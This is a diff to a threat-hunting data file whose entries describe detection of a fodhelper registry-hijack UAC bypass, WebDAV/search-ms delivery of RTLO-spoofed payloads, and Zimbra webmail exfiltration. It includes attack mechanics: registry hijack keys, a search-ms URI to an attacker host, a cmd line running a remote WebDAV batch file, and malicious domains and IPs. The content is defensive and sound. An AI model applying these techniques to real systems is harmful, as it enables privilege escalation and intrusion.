+    "notes": "PLATFORM: Windows. SOURCE: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20). The recovered kit's Tier-5 test set included `I49_fodhelper.url`, `I50_computerdefaults.url`,\nand `I52_wsreset.url`, and the DlrtyGames chain performed COM auto-elevation through dllhost.exe; the final\npayload was PureRAT 4.4.3. HEARTH had no T1548.002 coverage.\n\nATTACK MECHANICS: UAC bypass here is logic abuse, not memory corruption. Auto-elevating Microsoft binaries\n(marked autoElevate=true) launch to high integrity without a prompt and then open a handler resolved via the\nregistry. fodhelper/computerdefaults look up `HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command`; because HKCU\nis checked before HKCR and is user-writable, a medium-integrity process pre-populates that key (often with a\n`DelegateExecute` value) so the elevated binary runs the attacker's command as high integrity. Sibling keys:\n`HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` (eventvwr), `HKCU\\Software\\Classes\\Folder\\shell\\open\\command`\nand `exefile\\shell\\runas\\command\\IsolatedCommand` (sdclt), `HKCU\\Environment` windir hijack (SilentCleanup).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 13: value set on `HKCU\\Software\\Classes\\{ms-settings|mscfile|Folder}\\...\\shell\\open\\command` or a\n  `DelegateExecute` value — capture in real time, since operators often delete the key immediately after (a\n  point-in-time registry scan misses it). SwiftOnSecurity Sysmon config covers these paths by default.\n- Sysmon EID 1 / 4688: fodhelper.exe / computerdefaults.exe / eventvwr.exe / sdclt.exe / wsreset.exe (or\n  dllhost.exe COM surrogate) spawning cmd/powershell/mshta/rundll32 or an unsigned binary — a Medium→High\n  integrity transition with NO preceding consent.exe. \"A legitimate fodhelper.exe should never spawn a shell.\"\n- Correlation rule: any HKCU\\Software\\Classes\\...\\command write within ~5 min BEFORE an auto-elevating binary\n  launches. Then trace the high-integrity session for LSASS access, service install (7045), or encoded PowerShell.\n- Evasion watch: Sysmon EID 12/14 registry symbolic-link creation with value name `SymbolicLinkValue` (UACME\n  >=3.5 uses a symlink+rename to dodge shell-open-command monitoring).\n\nCROSS-REF: T1112 (Modify Registry — the HKCU hijack is the registry-write half); T1055 (the PureRAT payload this\nbypass elevates then injects); the same Rapid7 lab drives H240 (T1036.007 delivery) and H241/B032 (WMI\npersistence) — different stages of one intrusion.\n",
+    "tags": [
+      "privilege_escalation",
+      "defense_evasion",
+      "windows",
+      "uac_bypass",
+      "fodhelper",
+      "computerdefaults",
+      "registry_hijack",
+      "purerat",
+      "t1548_002",
+      "t1112",
+      "T1548.002"
+    ],
+    "techniques": [
+      "T1548.002"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The footprint is narrow and well-known — that's the defender's edge.** The technique reduces to one registry-key family plus an auto-elevating binary spawning an unexpected child, so a tight rule catches the whole UACME family without drowning in noise.\n- **Registry writes must be caught in flight.** Operators frequently delete the `shell\\open\\command` key right after elevation, so real-time Sysmon EID 13 capture — not a point-in-time scan — is what preserves the payload-bearing evidence.\n- **Process lineage is a hard behavioral invariant.** `fodhelper.exe` or `computerdefaults.exe` never legitimately spawns `cmd`/`powershell`; a Medium→High integrity jump with no preceding `consent.exe` prompt is a structural anomaly that survives payload changes.\n- **It gates the expensive post-exploitation.** UAC bypass is the doorway to credential dumping, service install, and tamper of security tools; catching the elevation denies the operator high-integrity actions before they start.",
+    "references": "- [MITRE ATT&CK T1548.002: Abuse Elevation Control Mechanism — Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Elastic Security Labs: Exploring Windows UAC Bypasses — Techniques and Detection Strategies](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies)\n- [Splunk Security Content: FodHelper UAC Bypass](https://research.splunk.com/endpoint/909f8fd8-7ac8-11eb-a1f3-acde48001122/)\n- [Atomic Red Team: T1548.002 — Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md)\n- [hfiref0x/UACME: Defeating Windows User Account Control (technique catalogue)](https://github.com/hfiref0x/UACME)",
+    "file_path": "Flames/H243.md",
+    "created": null
+  },
+  {
     "id": "M001",
     "category": "Alchemy",
     "title": "A machine learning model can detect anomalies in user login patterns that indicate compromised accounts.",
@@ -8865,5 +9037,41 @@ const HUNTS_DATA = [
     "references": "- [MITRE ATT&CK T1213.004: Data from Information Repositories — Customer Relationship Management Software](https://attack.mitre.org/techniques/T1213/004/)\n- [Microsoft Security Blog: Defending SaaS-based applications against ShinyHunters OAuth abuse](https://www.microsoft.com/en-us/security/blog/2026/07/13/defending-saas-based-applications-against-shinyhunters-oauth-abuse/)\n- [Google Cloud / Mandiant: The Cost of a Call — From Voice Phishing to Data Extortion (UNC6040)](https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion)\n- [AppOmni: Detecting ShinyHunters/UNC6040 Vishing in Salesforce OAuth Attacks](https://appomni.com/blog/detecting-unc6040-vishing-in-salesforce-oauth-attacks/)\n- [Salesforce: Real-Time Event Monitoring — ReportExport and API events](https://help.salesforce.com/s/articleView?id=sf.real_time_event_monitoring_overview.htm)\n- [Elastic Security Labs: Microsoft Entra ID OAuth Phishing and Detections](https://www.elastic.co/security-labs/entra-id-oauth-phishing-detection)",
     "file_path": "Alchemy/M028.md",
     "created": "2026-07-18T14:13:05-05:00"
+  },
+  {
+    "id": "M029",
+    "category": "Alchemy",
+    "title": "Anomalous mail-data egress volume from the webmail tier to first-seen external domains (Zimbra XSS exfil)",
+    "tactic": "Exfiltration",
+    "notes": "ALCHEMY ANALYTIC — per-server / per-user volumetric + first-seen-destination anomaly detection on webmail egress. PLATFORM: Linux (Zimbra Collaboration Suite mail servers) and the network/proxy tier in front of webmail. Sources: Unit 42, \"Russian Global Webmail Espionage\" (2026-07-23, tracked as CL-STA-1114 / Void Blizzard / LAUNDRY BEAR), and CISA advisory AA26-204A (Russian state-sponsored phishing targeting Zimbra users, 2026-07-23). The intrusion set exploited CVE-2025-66376 via a phishing email carrying an HTML attachment with an obfuscated Base64 script; observed dwell time averaged ~35 days. Note: Unit 42 does NOT corroborate the Sednit/APT28 attribution some press applied; it tracks the actor as Void Blizzard / LAUNDRY BEAR.\n\nWHY MODEL-ASSISTED (not a static rule): webmail servers make outbound web requests constantly (federation, link previews, integrations), and the XSS payload runs inside a legitimate authenticated session, so exfil traffic is camouflaged. Attackers also pace collection over weeks. The separating signal is deviation from a given server's or user's own egress envelope plus destination novelty — a volumetric/behavioral problem, not a signature. The actor's transport protocol/port and exact volume were NOT published, so a threshold tuned to one campaign will not generalize; per-entity baselining will.\n\nDATA SOURCES / FIELDS: web proxy / NGFW / NetFlow-IPFIX egress from the webmail subnet (bytes_out, dest domain/IP, dest port, request count, TLS SNI, HTTP host + user-agent); Zimbra access/mailbox audit logs (mailbox.log, audit.log) for read/search/export volume per account; DNS logs for first-seen external domain resolution from the mail tier. FEATURES per webmail server AND per authenticated user over a rolling ~30-day baseline: summed outbound bytes to external destinations; count of distinct external domains contacted; share of egress to first-seen / newly-registered domains; request rate to a single external host; egress outside business hours; ratio of current egress to that entity's historical mean; correlation of an egress spike with a preceding inbound HTML-attachment email. MODEL: per-entity baseline + robust outlier scoring (z-score/MAD or isolation forest) on the volume and destination-novelty features; alert when an entity crosses from its normal envelope into sustained high-volume egress, weighted heavily when the destination is first-seen or matches a Zimbra-lookalike naming pattern.\n\nKNOWN-BAD SEED IOCs (for backtest/enrichment, not as the detection): domains masquerading as Zimbra services — zimbra-metadata[.]com, zimbrastat[.]com, zimbrasoft[.]com[.]ua, synacorzimbra[.]nl, mailnalysis[.]com, emailanalytics[.]com[.]ua, analyticemailmeter[.]com, istc-cloud[.]com; IPs 37.120.247[.]228, 64.226.124[.]190, 104.248.134[.]194, 185.86.79[.]95, 193.238.152[.]66, 194.156.103[.]193, 216.252.238[.]18/.64/.104. VALIDATION / TUNING: backtest against known heavy periods (mail migrations, bulk-export/eDiscovery, newsletter sends) to set per-entity thresholds; allowlist sanctioned integrations/federation destinations by domain but keep them baselined. NAIVE FOIL: a fixed \"N MB/day out of the mail server\" threshold — bypassed by paced multi-week exfil and noisy on federated servers; the separating signal is deviation from the entity's own egress baseline plus destination novelty. CROSS-REF: T1114.002 (Remote Email Collection — what is being staged/stolen), T1556.006 (MFA interception — the 2FA/session material the payload also grabs), and T1189 (drive-by/zero-click XSS as the delivery) for the upstream legs.",
+    "tags": [
+      "exfiltration",
+      "linux",
+      "webmail",
+      "zimbra",
+      "email_collection",
+      "volumetric",
+      "model_assisted",
+      "void_blizzard",
+      "laundry_bear",
+      "t1048_003",
+      "t1114_002",
+      "t1556_006",
+      "T1048.003"
+    ],
+    "techniques": [
+      "T1048.003"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The request is legitimate; the volume and destination are not.** A webmail server making outbound web requests is normal, and the XSS payload runs inside a real authenticated session, so no single request is malicious — only the deviation from the server's/user's own egress envelope, and the novelty of the destination, separate theft from work. That per-entity anomaly framing is why this is an Alchemy hunt, not a Flame.\n- **Static thresholds lose both ways here.** The actor paced collection over a ~35-day dwell and the campaign's transport/volume were never published, so a fixed MB/day limit is both bypassed by slow exfil and noisy on federated mail servers; a per-entity baseline adapts to each server's normal and catches the relative spike.\n- **Destination novelty is the durable half of the signal.** The operators used domains dressed up as Zimbra analytics/metadata services; modeling the *rate of first-seen external destinations* from the mail tier catches the pattern even after the specific lookalike domains rotate — where an IOC block-list goes stale.\n- **The mail tier is a bright, well-scoped place to watch.** Webmail servers have a small, stable set of legitimate external destinations, so egress anomalies there carry far more signal than the same analytic run against general user browsing.",
+    "references": "- [MITRE ATT&CK T1048.003: Exfiltration Over Alternative Protocol — Exfiltration Over Unencrypted Non-C2 Protocol](https://attack.mitre.org/techniques/T1048/003/)\n- [Unit 42 (Palo Alto Networks): Russian Global Webmail Espionage (CL-STA-1114 / Void Blizzard)](https://unit42.paloaltonetworks.com/russian-webmail-espionage/)\n- [CISA Advisory AA26-204A: Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Zimbra Collaboration Suite Users](https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a)\n- [ESET Research: Operation RoundPress — XSS Exploitation of Webmail Servers (Zimbra/Roundcube/Horde)](https://www.welivesecurity.com/en/eset-research/operation-roundpress/)\n- [Elastic Security Labs: Hunting for Data Exfiltration Over the Network](https://www.elastic.co/security-labs/network-exfiltration-detection)\n- [MITRE ATT&CK T1114.002: Email Collection — Remote Email Collection](https://attack.mitre.org/techniques/T1114/002/)",
+    "file_path": "Alchemy/M029.md",
+    "created": null
   }
 ];

--- a/hunts-data.js
+++ b/hunts-data.js
@@ -8234,7 +8234,7 @@ const HUNTS_DATA = [
     "why": "- Talos tied this behavior to active Chaos ransomware operations and named concrete artifacts: `update_ms.msi`, `C:\\ProgramData\\update_ms.msi`, `lib.dll`, and CDP binding names such as `msaOpen` and `msaMessage`.\n- The hunt survives IP and domain rotation because the RAT still has to stage an MSI, load the embedded DLL, start a headless browser, and control it through a local debugging channel.\n- MDR teams can observe the chain with standard endpoint telemetry: process creation, file creation, module loads, browser command lines, localhost connections, and process-owned network metadata.\n- False positives are controllable because benign browser automation is not expected to appear immediately after `curl.exe` writes an MSI into `ProgramData` and `msiexec.exe` loads a payload DLL.",
     "references": "- [Cisco Talos: Chaos ransomware msaRAT browser C2](https://blog.talosintelligence.com/chaos-msarat-living-off-the-browser-to-build-covert-c2-channel/)\n- [MITRE ATT&CK T1105 Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)\n- [MITRE ATT&CK T1218.007 Msiexec](https://attack.mitre.org/techniques/T1218/007/)\n- [MITRE ATT&CK T1090 Proxy](https://attack.mitre.org/techniques/T1090/)\n- [MITRE ATT&CK T1071.001 Web Protocols](https://attack.mitre.org/techniques/T1071/001/)",
     "file_path": "Flames/H240.md",
-    "created": "2026-07-25T22:17:55-05:00"
+    "created": "2026-07-24T22:31:47-04:00"
   },
   {
     "id": "H241",

--- a/hunts-data.js
+++ b/hunts-data.js
@@ -982,7 +982,7 @@ const HUNTS_DATA = [
     "why": "- **Malicious WMI persistence hides among legitimate management subscriptions, not among noise.** The few products that create permanent subscriptions look structurally similar to an attacker's, so only a vetted allowlist of *which* consumers legitimately exist — keyed on the consumer action and its creating signer — makes a rogue one stand out. That is why this is an Ember, not a Flame.\n- **The repository must be swept, not just watched.** Persistence installed before monitoring began lives silently in the CIM database with no ongoing event; a one-time enumeration of `root\\subscription` across the estate is the only way to find pre-existing implants, which a purely streaming rule never sees.\n- **The volume is low enough to inventory completely.** Permanent subscriptions are rare, so unlike most baselines this one can aim for full coverage — every filter, consumer, and binding — turning the baseline itself into a durable asset inventory.\n- **It is the prerequisite for the persistence Flame.** H241 can only call a consumer \"unexpected\" against this allowlist; without the baseline, every SCCM or monitoring subscription is a false positive and the Flame is unusable.",
     "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [in.security: An Intro into Abusing and Identifying WMI Event Subscriptions for Persistence](https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/)\n- [osquery schema: wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings](https://osquery.io/schema/current)\n- [Splunk Security Content: WMI Permanent Event Subscription — Sysmon](https://research.splunk.com/endpoint/ad05aae6-3b2a-4f73-af97-57bd26cee3b9/)",
     "file_path": "Embers/B032.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "H001",
@@ -8199,42 +8199,6 @@ const HUNTS_DATA = [
     "created": "2026-07-24T22:31:35-04:00"
   },
   {
-    "id": "H240",
-    "category": "Flames",
-    "title": "Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms",
-    "tactic": "Defense Evasion",
-    "notes": "PLATFORM: Windows. Source: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20), which recovered an operator's staging server full of bulk-generated lures. Final payload in\nboth observed chains was PureRAT 4.4.3 (build tag 06x12x2026SantaEbash2).\n\nATTACK MECHANICS (from the report): a JavaScript-triggered search-ms URI opens a WebDAV share filtered to a single\nextension — e.g. `search-ms:displayname=Search Results in \\\\onedrive.cv@80\\Downloads\\CURP&query=*.scr` — so the\nvictim sees what looks like a local search result. The lures follow a systematic naming scheme\n`HyperPackSetup.<method>.<trick>.<spoof>.lnk`, and the primary document lure was `ReportFinal.rcs.pdf`, an\nRTLO-masqueraded .scr. The report explicitly lists three spoofing tricks stacked together: RTLO (U+202E), double\nextensions, and whitespace padding before .exe / .scr. Sibling delivery vectors in the same kit: UNC paths,\nlibrary-ms, Control Panel items, and LOLBin proxies (iediagcmd.exe, CustomShellHost.exe, OfficeC2RClient.exe).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 11 (File Create) for files landing in Downloads/%TEMP% whose name contains U+202E, homoglyph\n  characters in the extension, or a double extension where the TRUE trailing extension is .lnk/.scr/.exe/.js.\n- WebClient service starting (svchost -k WebClientGroup / System 7036 \"WebClient → Running\") on a host that does\n  not normally mount WebDAV, immediately followed by:\n- Sysmon EID 1: `rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie <host>@<port> http://<host>:<port>/`\n  (SysWOW64 variant too) — the WebDAV client fetching content — with Sysmon EID 3 to a first-seen/external host.\n- Process lineage: explorer.exe → the spoofed .lnk/.scr, or cmd.exe `/c \\\\<host>@SSL\\DavWWWRoot\\new.bat`, or a\n  decoy .pdf opened from the same DavWWWRoot path while the real payload executes.\n- Parse recovered .lnk with LECmd: RelativePath / WorkingDir pointing at `\\\\<host>@<port>\\DavWWWRoot\\files`.\n\nCROSS-REF: pair with T1036.002 (Right-to-Left Override — the RTLO half of the same spoof), T1204.002 (Malicious\nFile — the user double-click this hunt depends on), and T1055 (the report's PureRAT injects into a signed Qihoo\n360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the\npost-execution stages of the same intrusion set.\n",
-    "tags": [
-      "defense_evasion",
-      "windows",
-      "masquerading",
-      "double_extension",
-      "rtlo",
-      "webdav",
-      "search_ms",
-      "initial_access",
-      "purerat",
-      "t1036_007",
-      "t1036_002",
-      "t1204_002",
-      "T1036.007"
-    ],
-    "techniques": [
-      "T1036.007"
-    ],
-    "severity": null,
-    "status": "current",
-    "related_hunt_ids": [],
-    "submitter": {
-      "name": "Lauren Proehl",
-      "link": "https://x.com/jotunvillur"
-    },
-    "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
-    "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
-    "file_path": "Flames/H240.md",
-    "created": null
-  },
-  {
     "id": "H241",
     "category": "Flames",
     "title": "WMI permanent event subscription persistence executing a script interpreter or LOLBin",
@@ -8266,7 +8230,7 @@ const HUNTS_DATA = [
     "why": "- **Fileless and SYSTEM-context by design.** The persistence lives in the CIM repository, not the filesystem, and executes through a trusted broker, so disk-based and signature detections miss it — creation telemetry (Sysmon 19/20/21) is the reliable catch point.\n- **The telemetry is nearly noise-free.** Permanent WMI subscriptions are rare outside a handful of management tools, so a log-all approach with a small allowlist yields high-fidelity alerts rather than a flood.\n- **Temporal correlation is a strong, durable signal.** Filter + consumer + binding created within the same second is a structural fingerprint of the technique that survives payload and infrastructure changes.\n- **It pairs with a concrete baseline.** The one false-positive source — legitimate management subscriptions — is exactly what B032 inventories, so the two hunts together turn \"any subscription\" into \"any subscription not on the allowlist.\"",
     "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [SigmaHQ: WMI Event Subscription (sysmon_wmi_event_subscription.yml)](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml)\n- [Splunk Security Content: Detect WMI Event Subscription Persistence](https://research.splunk.com/endpoint/01d9a0c2-cece-11eb-ab46-acde48001122/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [Detect.FYI: Hunting WMI Event Subscription Persistence](https://detect.fyi/hunting-wmi-event-subscription-persistence-f087900029f4)",
     "file_path": "Flames/H241.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "H242",
@@ -8300,7 +8264,7 @@ const HUNTS_DATA = [
     "why": "- **The check runs before the payload, so catching it interdicts everything downstream.** Both loaders decide whether to detonate based on the anti-debug gate; the injection, C2, and persistence only happen if the gate passes — so the anti-analysis behavior is the earliest reliable catch point.\n- **Self-debugging is anomalous by construction.** A short-lived, unsigned process creating a debug object and attaching to a child it just spawned (with a spoofed `winlogon.exe` parent) is not something benign software does — it is the technique's fingerprint, independent of the C2 or payload.\n- **The banned-process scan is a distinctive tell.** A `CreateToolhelp32Snapshot` walk that matches on `x64dbg`/`windbg`/`procmon`/`wireshark` and is immediately followed by self-termination is a behavioral signature that survives sample changes.\n- **Direct syscalls signal deliberate evasion.** `ZwSystemDebugControl`/`NtSetContextThread` issued via SysWhispers-style direct syscalls (bypassing ntdll hooks) from a non-debugger is itself suspicious and, where ETW-TI is available, directly observable.",
     "references": "- [MITRE ATT&CK T1622: Debugger Evasion](https://attack.mitre.org/techniques/T1622/)\n- [Sekoia TDR: RATatouille — Cooking Up Chaos in the I2P Kitchen (I2PRAT)](https://www.sekoia.com/blog/ratatouille-cooking-up-chaos-in-the-i2p-kitchen)\n- [Sekoia TDR: PikaBot — a Guide to its Deep Secrets and Operations](https://www.sekoia.com/blog/pikabot-a-guide-to-its-deep-secrets-and-operations)\n- [Check Point Anti-Debug Reference: Debug Objects & Debugger Detection](https://anti-debug.checkpoint.com/)\n- [Unprotect Project: Anti-Debugging Techniques](https://unprotect.it/category/anti-debugging/)\n- [MITRE ATT&CK T1497.001: Virtualization/Sandbox Evasion — System Checks](https://attack.mitre.org/techniques/T1497/001/)",
     "file_path": "Flames/H242.md",
-    "created": null
+    "created": "2026-07-25T22:17:55-05:00"
   },
   {
     "id": "H243",
@@ -8334,6 +8298,42 @@ const HUNTS_DATA = [
     "why": "- **The footprint is narrow and well-known — that's the defender's edge.** The technique reduces to one registry-key family plus an auto-elevating binary spawning an unexpected child, so a tight rule catches the whole UACME family without drowning in noise.\n- **Registry writes must be caught in flight.** Operators frequently delete the `shell\\open\\command` key right after elevation, so real-time Sysmon EID 13 capture — not a point-in-time scan — is what preserves the payload-bearing evidence.\n- **Process lineage is a hard behavioral invariant.** `fodhelper.exe` or `computerdefaults.exe` never legitimately spawns `cmd`/`powershell`; a Medium→High integrity jump with no preceding `consent.exe` prompt is a structural anomaly that survives payload changes.\n- **It gates the expensive post-exploitation.** UAC bypass is the doorway to credential dumping, service install, and tamper of security tools; catching the elevation denies the operator high-integrity actions before they start.",
     "references": "- [MITRE ATT&CK T1548.002: Abuse Elevation Control Mechanism — Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Elastic Security Labs: Exploring Windows UAC Bypasses — Techniques and Detection Strategies](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies)\n- [Splunk Security Content: FodHelper UAC Bypass](https://research.splunk.com/endpoint/909f8fd8-7ac8-11eb-a1f3-acde48001122/)\n- [Atomic Red Team: T1548.002 — Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md)\n- [hfiref0x/UACME: Defeating Windows User Account Control (technique catalogue)](https://github.com/hfiref0x/UACME)",
     "file_path": "Flames/H243.md",
+    "created": "2026-07-25T22:17:55-05:00"
+  },
+  {
+    "id": "H244",
+    "category": "Flames",
+    "title": "Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms",
+    "tactic": "Defense Evasion",
+    "notes": "PLATFORM: Windows. Source: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20), which recovered an operator's staging server full of bulk-generated lures. Final payload in\nboth observed chains was PureRAT 4.4.3 (build tag 06x12x2026SantaEbash2).\n\nATTACK MECHANICS (from the report): a JavaScript-triggered search-ms URI opens a WebDAV share filtered to a single\nextension — e.g. `search-ms:displayname=Search Results in \\\\onedrive.cv@80\\Downloads\\CURP&query=*.scr` — so the\nvictim sees what looks like a local search result. The lures follow a systematic naming scheme\n`HyperPackSetup.<method>.<trick>.<spoof>.lnk`, and the primary document lure was `ReportFinal.rcs.pdf`, an\nRTLO-masqueraded .scr. The report explicitly lists three spoofing tricks stacked together: RTLO (U+202E), double\nextensions, and whitespace padding before .exe / .scr. Sibling delivery vectors in the same kit: UNC paths,\nlibrary-ms, Control Panel items, and LOLBin proxies (iediagcmd.exe, CustomShellHost.exe, OfficeC2RClient.exe).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 11 (File Create) for files landing in Downloads/%TEMP% whose name contains U+202E, homoglyph\n  characters in the extension, or a double extension where the TRUE trailing extension is .lnk/.scr/.exe/.js.\n- WebClient service starting (svchost -k WebClientGroup / System 7036 \"WebClient → Running\") on a host that does\n  not normally mount WebDAV, immediately followed by:\n- Sysmon EID 1: `rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie <host>@<port> http://<host>:<port>/`\n  (SysWOW64 variant too) — the WebDAV client fetching content — with Sysmon EID 3 to a first-seen/external host.\n- Process lineage: explorer.exe → the spoofed .lnk/.scr, or cmd.exe `/c \\\\<host>@SSL\\DavWWWRoot\\new.bat`, or a\n  decoy .pdf opened from the same DavWWWRoot path while the real payload executes.\n- Parse recovered .lnk with LECmd: RelativePath / WorkingDir pointing at `\\\\<host>@<port>\\DavWWWRoot\\files`.\n\nCROSS-REF: pair with T1036.002 (Right-to-Left Override — the RTLO half of the same spoof), T1204.002 (Malicious\nFile — the user double-click this hunt depends on), and T1055 (the report's PureRAT injects into a signed Qihoo\n360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the\npost-execution stages of the same intrusion set.\n",
+    "tags": [
+      "defense_evasion",
+      "windows",
+      "masquerading",
+      "double_extension",
+      "rtlo",
+      "webdav",
+      "search_ms",
+      "initial_access",
+      "purerat",
+      "t1036_007",
+      "t1036_002",
+      "t1204_002",
+      "T1036.007"
+    ],
+    "techniques": [
+      "T1036.007"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
+    "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
+    "file_path": "Flames/H244.md",
     "created": null
   },
   {
@@ -9072,6 +9072,6 @@ const HUNTS_DATA = [
